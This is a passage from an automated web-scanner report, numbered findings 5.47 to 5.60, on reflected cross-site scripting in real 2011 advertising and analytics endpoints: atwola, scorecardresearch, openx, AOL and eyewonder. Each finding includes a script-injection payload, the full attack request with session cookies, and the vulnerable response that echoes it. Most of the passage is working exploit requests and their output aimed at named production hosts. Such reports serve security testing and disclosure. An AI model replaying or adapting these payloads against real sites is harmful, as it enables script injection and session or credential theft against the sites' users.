Cookie: JEB2=4DB8055D6E651A440C6EAF39F00069A8; ATTAC=a3ZzZWc9OTk5OTk6NTExMzQ6NTAwODY6NTMzODA6NjA0OTA6NjA1MTI6NTA5NjM6NTI2MTU6NjA0OTE6NTA1MDc6NTM2NTY6NTU0MDE6NTcwOTQ6NTA5NjE6NTI4NDE6NTExODI6NTY0MTk6NTQwMzI6NTExODY6NTY2NzM6NTYxNDg6NTczNjI6NTY5Njk6NjAyMDM6NTY4MzU6NTY5ODc6NTY3ODA6NTAyMjA6NTY3Njg6NTYyOTk6NTY3NjE=; Axxd=1; AxData=; ATTACID=a3Z0aWQ9MTZyNG9wcTF0dmxrbWw=;

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 229

<html><body><base target=_top><script language="JavaScript" type="text/javascript" src="http://at.atwola.com/addyn/3.0/5113.1/221794/0/-1/size7b4de"><script>alert(1)</script>118786fa1f1=300x250;adiframe=y">
...[SNIP]...

5.47. http://at.atwola.com/adiframe/3.0/5113.1/221794/0/-1/size=300x250 [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://at.atwola.com
Path:	/adiframe/3.0/5113.1/221794/0/-1/size=300x250

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3b2c3"><script>alert(1)</script>8a7aa19fc65 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe/3.0/5113.1/221794/0/-1/size=300x250?3b2c3"><script>alert(1)</script>8a7aa19fc65=1 HTTP/1.1
Host: at.atwola.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JEB2=4DB8055D6E651A440C6EAF39F00069A8; ATTAC=a3ZzZWc9OTk5OTk6NTExMzQ6NTAwODY6NTMzODA6NjA0OTA6NjA1MTI6NTA5NjM6NTI2MTU6NjA0OTE6NTA1MDc6NTM2NTY6NTU0MDE6NTcwOTQ6NTA5NjE6NTI4NDE6NTExODI6NTY0MTk6NTQwMzI6NTExODY6NTY2NzM6NTYxNDg6NTczNjI6NTY5Njk6NjAyMDM6NTY4MzU6NTY5ODc6NTY3ODA6NTAyMjA6NTY3Njg6NTYyOTk6NTY3NjE=; Axxd=1; AxData=; ATTACID=a3Z0aWQ9MTZyNG9wcTF0dmxrbWw=;

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 232

<html><body><base target=_top><script language="JavaScript" type="text/javascript" src="http://at.atwola.com/addyn/3.0/5113.1/221794/0/-1/size=300x250?3b2c3"><script>alert(1)</script>8a7aa19fc65=1;adiframe=y">
...[SNIP]...

5.48. http://at.atwola.com/adiframe/3.0/5113.1/221794/0/-1/size=300x250 [noperf parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://at.atwola.com
Path:	/adiframe/3.0/5113.1/221794/0/-1/size=300x250

Issue detail

The value of the noperf request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 99c25"><script>alert(1)</script>e067740386f was submitted in the noperf parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe/3.0/5113.1/221794/0/-1/size=300x250;noperf=1;alias=99c25"><script>alert(1)</script>e067740386f HTTP/1.1
Host: at.atwola.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JEB2=4DB8055D6E651A440C6EAF39F00069A8; ATTAC=a3ZzZWc9OTk5OTk6NTExMzQ6NTAwODY6NTAwODU6NTMzODA6NjA0OTA6NjA1MTI6NTA5NjM6NTI2MTU6NjA0OTE6NTA1MDc6NTM2NTY6NTU0MDE6NjA1MDk6NTcwOTQ6NTA5NjE6NTI4NDE6NTExODI6NTY0MTk6NTQwMzI6NTExODY6NTY5ODg6NTY2NzM6NTYxNDg6NTczNjI6NTY5Njk6NjAyMDM6NTY4MzU6NTY5ODc6NTY3ODA6NTAyMjA=; Axxd=1; AxData=1#50085|52841|50963|50507|50086; ATTACID=a3Z0aWQ9MTZyNG9wcTF0dmxrbWw=;

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 245

<html><body><base target=_top><script language="JavaScript" type="text/javascript" src="http://at.atwola.com/addyn/3.0/5113.1/221794/0/-1/size=300x250;noperf=1;alias=99c25"><script>alert(1)</script>e067740386f;adiframe=y">
...[SNIP]...

5.49. http://b.scorecardresearch.com/beacon.js [c1 parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/beacon.js

Issue detail

The value of the c1 request parameter is copied into the HTML document as plain text between tags. The payload d2060<script>alert(1)</script>a92a3305e16 was submitted in the c1 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8d2060<script>alert(1)</script>a92a3305e16&c2=2113&c3=20&c4=4837&c5=34872&c6=&c10=205196&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://ads.undertone.com/afr.php?zoneid=4837&cb=557126407
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=25894b9d-24.143.206.177-1303083414

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Thu, 12 May 2011 00:59:58 GMT
Date: Thu, 05 May 2011 00:59:58 GMT
Connection: close
Content-Length: 1248

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
E.purge=function(a){try{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();

COMSCORE.beacon({c1:"8d2060<script>alert(1)</script>a92a3305e16", c2:"2113", c3:"20", c4:"4837", c5:"34872", c6:"", c10:"205196", c15:"", c16:"", r:""});

5.50. http://b.scorecardresearch.com/beacon.js [c10 parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/beacon.js

Issue detail

The value of the c10 request parameter is copied into the HTML document as plain text between tags. The payload 915f9<script>alert(1)</script>521310be6bf was submitted in the c10 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=2113&c3=20&c4=4837&c5=34872&c6=&c10=205196915f9<script>alert(1)</script>521310be6bf&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://ads.undertone.com/afr.php?zoneid=4837&cb=557126407
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=25894b9d-24.143.206.177-1303083414

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Thu, 12 May 2011 00:59:58 GMT
Date: Thu, 05 May 2011 00:59:58 GMT
Connection: close
Content-Length: 1248

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
th-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();

COMSCORE.beacon({c1:"8", c2:"2113", c3:"20", c4:"4837", c5:"34872", c6:"", c10:"205196915f9<script>alert(1)</script>521310be6bf", c15:"", c16:"", r:""});

5.51. http://b.scorecardresearch.com/beacon.js [c15 parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/beacon.js

Issue detail

The value of the c15 request parameter is copied into the HTML document as plain text between tags. The payload d9079<script>alert(1)</script>19388ce5eb8 was submitted in the c15 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=2113&c3=20&c4=4837&c5=34872&c6=&c10=205196&c15=d9079<script>alert(1)</script>19388ce5eb8 HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://ads.undertone.com/afr.php?zoneid=4837&cb=557126407
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=25894b9d-24.143.206.177-1303083414

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Thu, 12 May 2011 00:59:58 GMT
Date: Thu, 05 May 2011 00:59:58 GMT
Connection: close
Content-Length: 1248

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();

COMSCORE.beacon({c1:"8", c2:"2113", c3:"20", c4:"4837", c5:"34872", c6:"", c10:"205196", c15:"d9079<script>alert(1)</script>19388ce5eb8", c16:"", r:""});

5.52. http://b.scorecardresearch.com/beacon.js [c2 parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/beacon.js

Issue detail

The value of the c2 request parameter is copied into the HTML document as plain text between tags. The payload 1ffa1<script>alert(1)</script>a6c0eeea5f1 was submitted in the c2 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=21131ffa1<script>alert(1)</script>a6c0eeea5f1&c3=20&c4=4837&c5=34872&c6=&c10=205196&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://ads.undertone.com/afr.php?zoneid=4837&cb=557126407
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=25894b9d-24.143.206.177-1303083414

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Thu, 12 May 2011 00:59:58 GMT
Date: Thu, 05 May 2011 00:59:58 GMT
Connection: close
Content-Length: 1248

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
ction(a){try{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();

COMSCORE.beacon({c1:"8", c2:"21131ffa1<script>alert(1)</script>a6c0eeea5f1", c3:"20", c4:"4837", c5:"34872", c6:"", c10:"205196", c15:"", c16:"", r:""});

5.53. http://b.scorecardresearch.com/beacon.js [c3 parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/beacon.js

Issue detail

The value of the c3 request parameter is copied into the HTML document as plain text between tags. The payload 93274<script>alert(1)</script>f68b1f5e88b was submitted in the c3 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=2113&c3=2093274<script>alert(1)</script>f68b1f5e88b&c4=4837&c5=34872&c6=&c10=205196&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://ads.undertone.com/afr.php?zoneid=4837&cb=557126407
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=25894b9d-24.143.206.177-1303083414

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Thu, 12 May 2011 00:59:58 GMT
Date: Thu, 05 May 2011 00:59:58 GMT
Connection: close
Content-Length: 1248

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
try{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();

COMSCORE.beacon({c1:"8", c2:"2113", c3:"2093274<script>alert(1)</script>f68b1f5e88b", c4:"4837", c5:"34872", c6:"", c10:"205196", c15:"", c16:"", r:""});

5.54. http://b.scorecardresearch.com/beacon.js [c4 parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/beacon.js

Issue detail

The value of the c4 request parameter is copied into the HTML document as plain text between tags. The payload 85f3a<script>alert(1)</script>fd4bc89f66e was submitted in the c4 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=2113&c3=20&c4=483785f3a<script>alert(1)</script>fd4bc89f66e&c5=34872&c6=&c10=205196&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://ads.undertone.com/afr.php?zoneid=4837&cb=557126407
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=25894b9d-24.143.206.177-1303083414

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Thu, 12 May 2011 00:59:58 GMT
Date: Thu, 05 May 2011 00:59:58 GMT
Connection: close
Content-Length: 1248

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();

COMSCORE.beacon({c1:"8", c2:"2113", c3:"20", c4:"483785f3a<script>alert(1)</script>fd4bc89f66e", c5:"34872", c6:"", c10:"205196", c15:"", c16:"", r:""});

5.55. http://b.scorecardresearch.com/beacon.js [c5 parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/beacon.js

Issue detail

The value of the c5 request parameter is copied into the HTML document as plain text between tags. The payload 1983e<script>alert(1)</script>b250d769c8e was submitted in the c5 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=2113&c3=20&c4=4837&c5=348721983e<script>alert(1)</script>b250d769c8e&c6=&c10=205196&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://ads.undertone.com/afr.php?zoneid=4837&cb=557126407
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=25894b9d-24.143.206.177-1303083414

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Thu, 12 May 2011 00:59:58 GMT
Date: Thu, 05 May 2011 00:59:58 GMT
Connection: close
Content-Length: 1248

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();

COMSCORE.beacon({c1:"8", c2:"2113", c3:"20", c4:"4837", c5:"348721983e<script>alert(1)</script>b250d769c8e", c6:"", c10:"205196", c15:"", c16:"", r:""});

5.56. http://b.scorecardresearch.com/beacon.js [c6 parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/beacon.js

Issue detail

The value of the c6 request parameter is copied into the HTML document as plain text between tags. The payload 9428f<script>alert(1)</script>87b9579e419 was submitted in the c6 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=2113&c3=20&c4=4837&c5=34872&c6=9428f<script>alert(1)</script>87b9579e419&c10=205196&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://ads.undertone.com/afr.php?zoneid=4837&cb=557126407
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=25894b9d-24.143.206.177-1303083414

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Thu, 12 May 2011 00:59:58 GMT
Date: Thu, 05 May 2011 00:59:58 GMT
Connection: close
Content-Length: 1248

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
e;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();

COMSCORE.beacon({c1:"8", c2:"2113", c3:"20", c4:"4837", c5:"34872", c6:"9428f<script>alert(1)</script>87b9579e419", c10:"205196", c15:"", c16:"", r:""});

5.57. http://bid.openx.net/json [c parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://bid.openx.net
Path:	/json

Issue detail

The value of the c request parameter is copied into the HTML document as plain text between tags. The payload 4d8c4<script>alert(1)</script>fd80bf050f8 was submitted in the c parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /json?c=OXM_274074675974d8c4<script>alert(1)</script>fd80bf050f8&pid=c7be9c39-b00b-4e4a-9ba7-a7008d2ad56b&s=300x250&f=1.19&cid=&url=http%3A%2F%2Fwww.huffingtonpost.com%2F%3Ficid%3Dnavbar_huffpo_main5 HTTP/1.1
Host: bid.openx.net
Proxy-Connection: keep-alive
Referer: http://www.huffingtonpost.com/?icid=navbar_huffpo_main5
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: i=02dd71c0-6aac-4019-82e3-049e51d96c25

Response

HTTP/1.1 200 OK
Content-Type: text/javascript; charset=utf-8
Cache-Control: no-cache, must-revalidate
P3P: CP="CUR ADM OUR NOR STA NID"
Connection: close
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Set-Cookie: s=b884589a-9f2b-4c96-8991-596a4f766c29; version=1; path=/; domain=.openx.net;
Set-Cookie: p=1304557173; version=1; path=/; domain=.openx.net; max-age=63072000;

OXM_274074675974d8c4<script>alert(1)</script>fd80bf050f8({"r":"\u003cdiv style\u003d\"position: absolute; width: 0px; height: 0px; overflow: hidden\"\u003e\u003cimg src\u003d\"http://bid.openx.net/log?l\u003dH4sIAAAAAAAAAD2OvU7DMBRGT9qkde1AJAod-e3AYok4IU12V
...[SNIP]...

5.58. http://c.aol.com/read/get_topics [callback parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://c.aol.com
Path:	/read/get_topics

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 68e91<script>alert(1)</script>d00482f33ea was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /read/get_topics?callback=jQuery1509592739215586334_130457509437568e91<script>alert(1)</script>d00482f33ea&channel_id=2&topic_id=19931896&topic_id=19932040&topic_id=19931885&topic_id=19930667&topic_id=19931276&topic_id=19931747&topic_id=19931406&topic_id=19931226&version=1&_=1304575104324 HTTP/1.1
Host: c.aol.com
Proxy-Connection: keep-alive
Referer: http://www.dailyfinance.com/?icid=navbar_finance_main5
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26D984D8851D3687-40000131C03E6937[CE]; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; s_pers=%20s_getnr%3D1304575100634-Repeat%7C1367647100634%3B%20s_nrgvo%3DRepeat%7C1367647100636%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; RSP_COOKIE=aid=c5999d1676b211e08f73fc32f1f68f78

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: application/json;charset=UTF-8
Date: Thu, 05 May 2011 00:59:06 GMT
Content-Length: 6439

jQuery1509592739215586334_130457509437568e91<script>alert(1)</script>d00482f33ea({
"topicList" : [ {
"type" : "article",
"createdTime" : "2011-05-05T00:30:13.000+0000",
"ndaysViews" : 0,
"viewCount" : 0,
"title" : "Survey: Most Americans Underestimate Retirem
...[SNIP]...

5.59. http://cdn4.eyewonder.com/cm/js/10295-119241-2568-4 [mpt parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://cdn4.eyewonder.com
Path:	/cm/js/10295-119241-2568-4

Issue detail

The value of the mpt request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 65460"-alert(1)-"44c1b558e46 was submitted in the mpt parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Request

GET /cm/js/10295-119241-2568-4?mpt=59915460965460"-alert(1)-"44c1b558e46&mpvc=http://at.atwola.com/adlink/5113/675309/0/170/AdId=1360646;BnId=6;itime=599154609;kvpg=mobile%2Eaol%2Fproduct%2Fiphone%2Fdaily%2Dfinance;kvugc=0;kvui=f49ac58470c911e0ba8373d1f2b58312;kvmn=93241795;kvtid=16r4opq1tvlkml;kr2703=77796;kvseg=99999:51134:50086:50085:53380:60490:60512:50963:52615:60491:50507:53656:55401:60509:57094:50961:52841:51182:56419:54032:51186:56988:56673:56148:57362:56969:60203:56835:56987:56780:50220;kp=92038;nodecode=yes;link= HTTP/1.1
Host: cdn4.eyewonder.com
Proxy-Connection: keep-alive
Referer: http://mobile.aol.com/product/iPhone/daily-finance/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=46431933753; mojo3=17671:21707

Response (redirected)

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 12:40:10 GMT
Server: Apache
Last-Modified: Mon, 24 Jan 2011 22:37:34 GMT
ETag: "59bffc-2ff-49a9f3efba780"
Accept-Ranges: bytes
Content-Length: 2303
Content-Type: application/x-javascript

var failclickTag_1420653 = "http://at.atwola.com/adlink/5113/675309/0/170/AdId=1360646;BnId=6;itime=599154609;kvpg=mobile.aol/product/iphone/daily-finance;kvugc=0;kvui=f49ac58470c911e0ba8373d1f2b58312
...[SNIP]...
:60509:57094:50961:52841:51182:56419:54032:51186:56988:56673:56148:57362:56969:60203:56835:56987:56780:50220;kp=92038;nodecode=yes;link=http://cdn4.eyewonder.com/cm/ck/10295-119241-2568-4?mpt=59915460965460"-alert(1)-"44c1b558e46&6830830=0";
var clickTag1_1420653 = "http://at.atwola.com/adlink/5113/675309/0/170/AdId=1360646;BnId=6;itime=599154609;kvpg=mobile.aol/product/iphone/daily-finance;kvugc=0;kvui=f49ac58470c911e0ba8373d
...[SNIP]...

5.60. http://cdn4.eyewonder.com/cm/js/10295-119241-2568-4 [mpvc parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://cdn4.eyewonder.com
Path:	/cm/js/10295-119241-2568-4

Issue detail

The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1ee58"%3balert(1)//1bf6f78cd31 was submitted in the mpvc parameter. This input was echoed as 1ee58";alert(1)//1bf6f78cd31 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Request

GET /cm/js/10295-119241-2568-4?mpt=599154609&mpvc=http://at.atwola.com/adlink/5113/675309/0/170/AdId=1360646;BnId=6;itime=599154609;kvpg=mobile%2Eaol%2Fproduct%2Fiphone%2Fdaily%2Dfinance;kvugc=0;kvui=f49ac58470c911e0ba8373d1f2b58312;kvmn=93241795;kvtid=16r4opq1tvlkml;kr2703=77796;kvseg=99999:51134:50086:50085:53380:60490:60512:50963:52615:60491:50507:53656:55401:60509:57094:50961:52841:51182:56419:54032:51186:56988:56673:56148:57362:56969:60203:56835:56987:56780:50220;kp=92038;nodecode=yes;link=1ee58"%3balert(1)//1bf6f78cd31 HTTP/1.1
Host: cdn4.eyewonder.com
Proxy-Connection: keep-alive
Referer: http://mobile.aol.com/product/iPhone/daily-finance/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=46431933753; mojo3=17671:21707

Response (redirected)

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 12:40:22 GMT
Server: Apache
Last-Modified: Mon, 24 Jan 2011 22:37:34 GMT
ETag: "59bffc-2ff-49a9f3efba780"
Accept-Ranges: bytes
Content-Length: 2303
Content-Type: application/x-javascript

var failclickTag_1420653 = "http://at.atwola.com/adlink/5113/675309/0/170/AdId=1360646;BnId=6;itime=599154609;kvpg=mobile.aol/product/iphone/daily-finance;kvugc=0;kvui=f49ac58470c911e0ba8373d1f2b58312
...[SNIP]...
